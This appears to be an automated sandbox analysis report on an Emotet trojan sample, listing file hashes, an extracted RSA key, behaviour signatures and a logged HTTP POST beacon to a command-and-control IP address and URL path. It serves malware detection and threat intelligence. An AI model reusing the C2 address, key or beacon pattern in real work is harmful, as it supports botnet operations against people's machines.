Analysis

  • max time kernel
    14s
  • max time network
    14s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    29-07-2020 07:20

General

  • Target

    a804f983133084ee1fe3b09b354a8e81adf1f97bb8e32c27f4551fd50a176486.exe

  • Size

    688KB

  • MD5

    e934d61c7f001cdb39cf4dd50c90b0cf

  • SHA1

    c8ba39222444e1171ea0ea1a5b824f8714a7902e

  • SHA256

    a804f983133084ee1fe3b09b354a8e81adf1f97bb8e32c27f4551fd50a176486

  • SHA512

    b2c15e7ac05408ea0fe6907dcb87870512b702b6fb00d67185b844f8acc74062b5a98cf48dfc9d39031416a72654bcd50eae3ac3bdd09e6b1dbd351b3455ce28

Score
10/10

Malware Config

Extracted

Family

emotet

C2


rsa_pubkey.plain

-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS
Q0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS
fkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB
-----END PUBLIC KEY-----

Signatures

  • Suspicious use of SetWindowsHookEx (2 IoCs)
  • Suspicious behavior: EnumeratesProcesses (4 IoCs)
  • Emotet Payload (1 IoC)

    Detects Emotet payload in memory.

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

Processes

  • C:\Users\Admin\AppData\Local\Temp\a804f983133084ee1fe3b09b354a8e81adf1f97bb8e32c27f4551fd50a176486.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\a804f983133084ee1fe3b09b354a8e81adf1f97bb8e32c27f4551fd50a176486.exe"
    PID: 3888
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: EnumeratesProcesses

Network

  • POST http://76.27.179.47/qbroRZrv/spNDLzsW/ID1Zjir/
    Process: a804f983133084ee1fe3b09b354a8e81adf1f97bb8e32c27f4551fd50a176486.exe
    Remote address: 76.27.179.47:80
    Request
    POST /qbroRZrv/spNDLzsW/ID1Zjir/ HTTP/1.1
    Referer: http://76.27.179.47/qbroRZrv/spNDLzsW/ID1Zjir/
    Content-Type: multipart/form-data; boundary=---------------------------250154921170666
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 76.27.179.47
    Content-Length: 4484
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Wed, 29 Jul 2020 07:21:09 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 132
    Connection: keep-alive
  • Remote address: 76.27.179.47:80
    URL: http://76.27.179.47/qbroRZrv/spNDLzsW/ID1Zjir/
    Protocol: http
    Process: a804f983133084ee1fe3b09b354a8e81adf1f97bb8e32c27f4551fd50a176486.exe
    5.3kB / 748 B / 9 / 4

    HTTP Request

    POST http://76.27.179.47/qbroRZrv/spNDLzsW/ID1Zjir/

    HTTP Response

    200

Downloads

  • memory/3888-0-0x0000000000670000-0x000000000067C000-memory.dmp

    Filesize

    48KB